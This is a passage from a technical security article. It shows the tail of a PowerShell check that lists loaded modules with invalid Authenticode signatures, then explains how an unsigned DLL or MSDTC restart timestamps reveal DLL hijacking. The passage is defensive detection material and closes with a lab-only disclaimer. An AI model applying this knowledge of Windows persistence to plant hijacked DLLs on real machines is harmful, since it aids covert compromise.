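        (Get-AuthenticodeSignature -FilePath $_.FileName).Status -ne 'Valid'
    } | Select-Object ModuleName, FileName
}
```

A name reported as absent is the normal state on a clean machine; the finding is a DLL that is present under that name but unsigned, or whose creation time matches the System log's service-restart entries (event 7036 for the MSDTC service) rather than the Windows install.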

All of my articles are technical sharing, documented for defensive purposes, and all operations were carried out in a lab environment. Please do not use them for any other purpose; you bear the consequences yourself.